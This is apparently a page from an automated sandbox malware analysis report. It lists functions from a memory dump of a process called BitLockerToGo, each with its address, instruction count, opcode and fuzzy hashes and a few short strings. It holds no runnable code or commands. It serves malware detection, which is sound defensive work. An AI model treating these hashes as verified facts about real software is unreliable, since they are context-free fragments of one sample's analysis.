
Function 032E81E5 Relevance: 1.3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

Strings

yG<U, xrefs: 032E822E

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: yG<U
API String ID: 0-710178763
Opcode ID: 46702ed29d8bde55b430223c66260278c36a6dcf3546310cd201478fc47809db
Instruction ID: 654942fd58c3f6e62b449cf5923beaad25c933cebc4bef4aee95fb70b54b0339
Opcode Fuzzy Hash: 46702ed29d8bde55b430223c66260278c36a6dcf3546310cd201478fc47809db
Instruction Fuzzy Hash: CAE0C974609201DFC344DF09F484826B7B2EF8A354B11D56DD85987319C330D816CA45

Function 032E8210 Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

yG<U, xrefs: 032E822E

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: yG<U
API String ID: 0-710178763
Opcode ID: 824ea3c83d8db0f2d53cdf71b2ec7baee60e3a729da1d16ba4d7f64bdcf31b95
Instruction ID: 320d5194a2a7dbb79ac9ac677482e02dedf3d918cba4f6ec523cc032c234d652
Opcode Fuzzy Hash: 824ea3c83d8db0f2d53cdf71b2ec7baee60e3a729da1d16ba4d7f64bdcf31b95
Instruction Fuzzy Hash: FED01738A092008FC340DF08E484A35B3F2EB8F328F24A06DE958E7366C731E952CA44

Function 032E7693 Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

H@jV, xrefs: 032E76AF

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: H@jV
API String ID: 0-308565474
Opcode ID: cbab797471ce18193b925e0beda7fca99d1348f407d5df7120399732b7205ff4
Instruction ID: 984e80ef82c732f83fff73e553de5c046958e3c183fcd2ba168cabe4cd5c81f1
Opcode Fuzzy Hash: cbab797471ce18193b925e0beda7fca99d1348f407d5df7120399732b7205ff4
Instruction Fuzzy Hash: 8BC012DDD60144CB9708FA22BC4383B723A9B93504B54A139C90317346EB68A596D14A

Function 032B8480 Relevance: .8, Instructions: 844COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49975a19c9d0ac683f6c5ee02f16b0a04a318af24452aaf128aac0537196b9be
Instruction ID: c7c989536f356037461ac52cd106ac298f7e6b0e6b085644efa6758d138776df
Opcode Fuzzy Hash: 49975a19c9d0ac683f6c5ee02f16b0a04a318af24452aaf128aac0537196b9be
Instruction Fuzzy Hash: 5B4239316287568BC724DF28D8806BAB3F9FFC4394F19496DD9CA87381E774A491CB42

Function 032E8790 Relevance: .8, Instructions: 793COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ececfc35cb47b2c04ff9d20052e3b5224f79adae163f03858e85053180919c91
Instruction ID: 08659bed2d78bad234c4e321f5fcedc1c058ca83a5e181d612ee664530aa9d18
Opcode Fuzzy Hash: ececfc35cb47b2c04ff9d20052e3b5224f79adae163f03858e85053180919c91
Instruction Fuzzy Hash: 3F32E235618212CFC704CF28E4A462AB7F2FF8A725F59CA6DE89997349C330D954CB81

Function 032E89C0 Relevance: .8, Instructions: 762COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3937a25a3f43d9f8db70c175c90956ae4077cb3b937257b5b177e6987c59e543
Instruction ID: 34f3fc51a8cc3af50c8d6ba3752af778027503758469894004b5e5a9e57203de
Opcode Fuzzy Hash: 3937a25a3f43d9f8db70c175c90956ae4077cb3b937257b5b177e6987c59e543
Instruction Fuzzy Hash: BB32D431618252CFC708DF24E4A422AB7E2FF8A715F59CA6DE8D99B385C730D954CB81

Function 032E88B0 Relevance: .8, Instructions: 752COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b0b7cb7dee0c76af4be7c3b364aa6d6f412c9c5816c3a03cf561114940b6948
Instruction ID: 80f9f6f0da09040f4cc4f9cfaab91334af634ad0e600d8f180bc247e9b0f5486
Opcode Fuzzy Hash: 9b0b7cb7dee0c76af4be7c3b364aa6d6f412c9c5816c3a03cf561114940b6948
Instruction Fuzzy Hash: B722D331618252CFC704CF28E4A462AF7E2FF8A725F59CA6DE88997349C330D955CB81

Function 032B3A09 Relevance: .6, Instructions: 585COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a29ed6fce9e0e76bf8c4459a00cb8ebf6653eb086c3b8a59cf46d38e1f415d87
Instruction ID: c337a97b49c68efb14640d80f2760bffd3891583bc684eeddf1d27de70f4d4cb
Opcode Fuzzy Hash: a29ed6fce9e0e76bf8c4459a00cb8ebf6653eb086c3b8a59cf46d38e1f415d87
Instruction Fuzzy Hash: EC32CC36918B518FC724CF29C0802AAF7F2BF88310F198A6DD9DA97751D774B885CB81

Function 032B67D0 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b12430adce1e811a8084317cf61cfe5e4d7bd9788aa97fcc6cc52f2869be33
Instruction ID: fe9d917db9822faa253589a55004607411aed9193f2a9982a4fe622c2cc74dd0
Opcode Fuzzy Hash: 09b12430adce1e811a8084317cf61cfe5e4d7bd9788aa97fcc6cc52f2869be33
Instruction Fuzzy Hash: 5302B1326183418FC714CF28C88066AFBF6FF98344F49896DE9999B352E375D845CB92

Function 032B14AE Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416374cfc7ce7ea9e93794d8830cb954132966eb925f5f67b3b9cc43526c2471
Instruction ID: 8c5ab93b1a07b769ec3fc64ce80f0c8434481427d78f426d199cfb997898b902
Opcode Fuzzy Hash: 416374cfc7ce7ea9e93794d8830cb954132966eb925f5f67b3b9cc43526c2471
Instruction Fuzzy Hash: BFE1D03A91C391DFE7009F68F09B25A7BE0BB4A311F4ACCADE5854B265C3789558CB81

Function 032CD8CC Relevance: .4, Instructions: 358COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbce27f360a8bc88d304c2cb7d1609aeaa5c7b55e55f7823623b06f3fb8560bf
Instruction ID: f80f4ee980498fa6b4203f1c0d32f462b4cb61be262866067f66f8cbe74140dd
Opcode Fuzzy Hash: fbce27f360a8bc88d304c2cb7d1609aeaa5c7b55e55f7823623b06f3fb8560bf
Instruction Fuzzy Hash: DFC16975621B42CFC324CF29C180A62F3F2FF4A7147598A6DC4868BB64E735E895CB50

Function 032B451F Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118a8063d1544756fab790fe76df4735d91f5a65531914f44f04c21cf05f49c3
Instruction ID: 8ff3325c2ab91663e95f4abd545d6b50d08e2aeeaf6f6cc98f4587b6ad7a88e1
Opcode Fuzzy Hash: 118a8063d1544756fab790fe76df4735d91f5a65531914f44f04c21cf05f49c3
Instruction Fuzzy Hash: DBD15471924B518FC328DE2AC5D06AAB7F1BF85750B588A2DD1A787B92C775F480CB00

Function 032B3E48 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6374e8853bc1bd907f8a5b84d41dcf0dd988f183020eba77b4d22b7164eaff9f
Instruction ID: 28a1d35ac54b7c8f67a4b5dad28e992fbb0faaf7b55c1aa5752ce1b42bebfebf
Opcode Fuzzy Hash: 6374e8853bc1bd907f8a5b84d41dcf0dd988f183020eba77b4d22b7164eaff9f
Instruction Fuzzy Hash: FBD1CF3691C7518FC729CF29C0906BAFBF1BF85344F188A6DE5DA93252D734A885CB41

Function 032B1092 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b53ac2e8027371cfc12a16c1686b932e4764a8153e95911de69ec4c6904117d5
Instruction ID: 6341004dfeeb9f24db8da22ae0666c5323853ec80b1d632acd99eddce48b2ab9
Opcode Fuzzy Hash: b53ac2e8027371cfc12a16c1686b932e4764a8153e95911de69ec4c6904117d5
Instruction Fuzzy Hash: 90C1243A51C291DFE3009F28F04A2967BE5FB8A301F4ACDA8E5948B389C339D951DB51

Function 032EA580 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8160cd1900d9861c14d986f6a45a981cf761dd4918178365c23dda35a6533d2
Instruction ID: 1b4c81f66aacc1aad1bed9af2ffa557ea3d375086099e80144428c6aa936e9c0
Opcode Fuzzy Hash: a8160cd1900d9861c14d986f6a45a981cf761dd4918178365c23dda35a6533d2
Instruction Fuzzy Hash: 43A10F75A143128FCB24DF18D891A6AB3F2FF88750F59892CE8859B351D730EC91CB91

Function 032EA250 Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b4dd2fb3e24e788972d1ed070c3a84d235be44b71688acf70a1ed2dc0ab4b4
Instruction ID: 2bec75782b68c37ab6a3756d44d815da48f4f1e45f6f471c663e77cabc1416b8
Opcode Fuzzy Hash: d6b4dd2fb3e24e788972d1ed070c3a84d235be44b71688acf70a1ed2dc0ab4b4
Instruction Fuzzy Hash: D691DC756153028FC724DF19C891A6BB3F2FF88714F998A6CE8869B350D730E891CB91

Function 032D433D Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de5f9488fcce612cb42a1790020302698e49ecaa6188b15e32f28fa12d83d3bd
Instruction ID: d2ccc6199f400f1e131ce1add20f0939346de83189f6f0ff038e93a51490c146
Opcode Fuzzy Hash: de5f9488fcce612cb42a1790020302698e49ecaa6188b15e32f28fa12d83d3bd
Instruction Fuzzy Hash: C5A1A435515B428FC325DB2AC4A13A3B7E2EF99320F188A5DC4E747B95DB34E481CB90

Function 032D42BB Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afb4bb185903f89d34846ff3a84479339182f26834881e3d127fdd43e995004
Instruction ID: c86083c33303db328e1289b3d2475846d2a7b46d6bf9e0ab178f2ebaccac653c
Opcode Fuzzy Hash: 2afb4bb185903f89d34846ff3a84479339182f26834881e3d127fdd43e995004
Instruction Fuzzy Hash: FD9113241147918BC739CB2AC090636FBF2FF96214B2C8A5EC4E74BB96DB35E485CB41

Function 032C0706 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbcd33e8cc7fbcc8ec221bf0d31440c2c85668646c30afe8f4de50c53f981787
Instruction ID: fae8bdb7ed2b0c64df240ef7ce24287fc790fffb15d1c928382b97bb4375a15c
Opcode Fuzzy Hash: dbcd33e8cc7fbcc8ec221bf0d31440c2c85668646c30afe8f4de50c53f981787
Instruction Fuzzy Hash: 988158B1920B819FD325CF28C495763B7F5BB45314F088A2DD4868BA81E774F98ACF91

Function 032C0976 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6881bcd7be08629a8a241d0af0917c33feab61906e55fb4cb0126686c3332c42
Instruction ID: ea5d0f8c727c8fc92f9cc3e4a8415a2cc2a653e92c2660e28494d42ffc03bd9f
Opcode Fuzzy Hash: 6881bcd7be08629a8a241d0af0917c33feab61906e55fb4cb0126686c3332c42
Instruction Fuzzy Hash: A8814971620B41CBE325CF28C894B62F7E5BF45314F188A6DD49A8BB91E770F885CB90

Function 032E2CF0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88981ba7abd967c49d4b62f570cbf0f5e1b22b4833ffd8472d04ba34897788b8
Instruction ID: 9c0ae798e9b09c046f6d81f93098a8ccfcea03b306e262e1952cb1eb2c5ef3ec
Opcode Fuzzy Hash: 88981ba7abd967c49d4b62f570cbf0f5e1b22b4833ffd8472d04ba34897788b8
Instruction Fuzzy Hash: 0051AAB15083458FE714EF29C89035BBBE4AB84308F444D2DE5E687390D379DA48CF82

Function 032B1AE2 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef52b503ee1cd859665d8964193a5ffe079cd2905ee2ab2710b41a4cb8af8f40
Instruction ID: 62a64386ee4e6f65b14ad94b46d42909ff0a2087fe5598bc5794515418383dcd
Opcode Fuzzy Hash: ef52b503ee1cd859665d8964193a5ffe079cd2905ee2ab2710b41a4cb8af8f40
Instruction Fuzzy Hash: 42514671615652CBFB008F1AE8A33B93BE1FF52312F06456EE8468B2C5C37AD156C791

Function 032E9C50 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6914ab12402c51dded8a4f5359b626da7a26deb3d74127011dead8b9ca9ea2
Instruction ID: 6b0a341f42627ec8c226d2b9ba9403951e07414a0c97d847beb1225499888c1c
Opcode Fuzzy Hash: 4d6914ab12402c51dded8a4f5359b626da7a26deb3d74127011dead8b9ca9ea2
Instruction Fuzzy Hash: A651BF75618301AFD314EF08C891B6AF7F2EB85714F58891DE9C99B380C379E895CB82

Function 032C42D0 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81f1d28bc41ee898dbcb34c023a799338ac5fed76401f3f0d3b85b73d10ba6e
Instruction ID: 5f495c68a57cfb02c3f8b85f692c48de3d5ae5e2acfa431f10c8621381e7368f
Opcode Fuzzy Hash: e81f1d28bc41ee898dbcb34c023a799338ac5fed76401f3f0d3b85b73d10ba6e
Instruction Fuzzy Hash: DA4128B59383859BC322FF55C89076BF7E8AB95214F59476CEC894B241E7B49880C351

Function 032D0F2E Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e112be3874eb993cee09551233708d5b24e586d61f2d5150608c8eed96dcb00
Instruction ID: 3ae28756944bfa0f601ab09c1d4ebd1beba58257b424294542a12c60fc847143
Opcode Fuzzy Hash: 6e112be3874eb993cee09551233708d5b24e586d61f2d5150608c8eed96dcb00
Instruction Fuzzy Hash: 6341B635528342EFD758DB08D4A0B3FBBA2EFC4395F68991CE4C617655C371A890CB92

Function 032BFD20 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03eb1a6ffe25267dd4d458ea5fbaa8969a6249d499a337322e94d092a9d9a25e
Instruction ID: de524465aad22d1a554489850d018c2ec8f07491bcaaec5d339fe780e30c2a34
Opcode Fuzzy Hash: 03eb1a6ffe25267dd4d458ea5fbaa8969a6249d499a337322e94d092a9d9a25e
Instruction Fuzzy Hash: A9412472A282A11FD308CE3E8C9027ABBE29BC5690F09873DF0A5C7281E634C945D791

Function 032C081F Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573fc608b189afc942578bc6d9ffeef71af1b301e224398ad5472f3834241716
Instruction ID: 6301a6b96c08af68992b5d097573151037162d167f45cc029abce081469a6c25
Opcode Fuzzy Hash: 573fc608b189afc942578bc6d9ffeef71af1b301e224398ad5472f3834241716
Instruction Fuzzy Hash: D231E274611B428FD324CF29D495B56BBF2EF4A304F08C95CD49A8BB66D738E881CB54

Function 032E7D71 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3710d0532f7c793cf56d1391a7c6da64641e0b6a922afcdd87d85e6adc964a
Instruction ID: 528aac5fb32b98db7eddcddb4b40c9db761a63556700c3c2b4876e0570b66e26
Opcode Fuzzy Hash: fb3710d0532f7c793cf56d1391a7c6da64641e0b6a922afcdd87d85e6adc964a
Instruction Fuzzy Hash: 3921F933E282524BD715CF2894A2226FBE7BBCA294F4E5679D895CB2C5D770C94187C0

Function 032C1268 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fea1a5cd4177f1e0c63b2419248539f3377604443a3b65aa5cae5bbbb2236bd
Instruction ID: 92125afcc962a6c5c9b03e4d5d3f2d70229bc85a2d0e3cf21071618b4ed8144e
Opcode Fuzzy Hash: 7fea1a5cd4177f1e0c63b2419248539f3377604443a3b65aa5cae5bbbb2236bd
Instruction Fuzzy Hash: F5312430614B028FD325CF29C895B66B7F2FF85310F09851CD4AA8B6A6D774F891CB84

Function 032EFA4E Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b3c6f7cb39dd2303529e4107ca6e25982ac9cf5dcd9db3f904a825a886e69c9
Instruction ID: a7c68b8d1f5133288715ef7980aa81a35956068b19139de5387429a126572275
Opcode Fuzzy Hash: 0b3c6f7cb39dd2303529e4107ca6e25982ac9cf5dcd9db3f904a825a886e69c9
Instruction Fuzzy Hash: ED21BF315182629FDB62DF75C9E4A46BBE5EF93340B1CD5C9C1908F24AD771E442C782

Function 032E6E98 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24cb48c26f15e7d5d1e99697fd70805bf6e8986805e671c83a80b0ad5d6188ed
Instruction ID: ebaba14bb507b9c20070dcb1a0befa8167eaa6bd888423c1ac052939439f834f
Opcode Fuzzy Hash: 24cb48c26f15e7d5d1e99697fd70805bf6e8986805e671c83a80b0ad5d6188ed
Instruction Fuzzy Hash: 62219D74A506028FC724CF19C9D6766F7F2EF42704B48854DC896CB796DB38E812CB84

Function 032E0C40 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 2313084216d0f56e134390db0060e8b2fd06fc01b172e30ba27a31110709a8e9
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4111E533A151E54EC316CD3D84405A5BFA30A93534FADD3D9F4B89B2D2D6628DCB8364

Function 032D30C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da0b34d646fc69de7db39d82389124298adc91ca2b164c5f60be6775bf2964d1
Instruction ID: 3ea0600855d40534c6bd98f96902a226a4f861fbf7c6029f24a0d3065097d177
Opcode Fuzzy Hash: da0b34d646fc69de7db39d82389124298adc91ca2b164c5f60be6775bf2964d1
Instruction Fuzzy Hash: F4015EBD61035287DA20DF54E4C0727E3B96F81A04F1C842CDA495B241DBB6E885C693

Function 032B3640 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39b64f4b30c3b866c3e1b996eef7441b95133b2cf44258337893d49302610f02
Instruction ID: 86ccf03830715c3863e7a8f36b9db2f60feda28e9627096a9e2d3a6729059f35
Opcode Fuzzy Hash: 39b64f4b30c3b866c3e1b996eef7441b95133b2cf44258337893d49302610f02
Instruction Fuzzy Hash: B1F0243BB2921A0BE754DCB9EC849ABF3A6E7C9244F0E8138E740D7301D030E80182A4

Function 032BD180 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 980113c692d9f85ae2996f07004a75224ab1b70018ff29061abda0b0d4a6cb5a
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 8AD0A7616587A60E9758CD3808A04F7FBF8E947A52B1C14DEE4E1E3105D224D84247A8

Function 032E6B63 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563e3f7660eb31bae509594fa922a43bc73595366ce56883ca3bceac84f7cb72
Instruction ID: e005976ec32319b3949445dd081b60b608d11aa31cb15f43428af6949815187f
Opcode Fuzzy Hash: 563e3f7660eb31bae509594fa922a43bc73595366ce56883ca3bceac84f7cb72
Instruction Fuzzy Hash: 4BC01298D515409FAA08FE12B84647B7167DE4311CBC8A035C80217706E661A15685DE

Function 032E6DCB Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01e9f582539b49cf91468d34239391c80b9da7b62505bae0548905033ff3f641
Instruction ID: 3ddcc79685d3a3cef231b36d36ddac81ba6c86134493d5b330b082a378dd927a
Opcode Fuzzy Hash: 01e9f582539b49cf91468d34239391c80b9da7b62505bae0548905033ff3f641
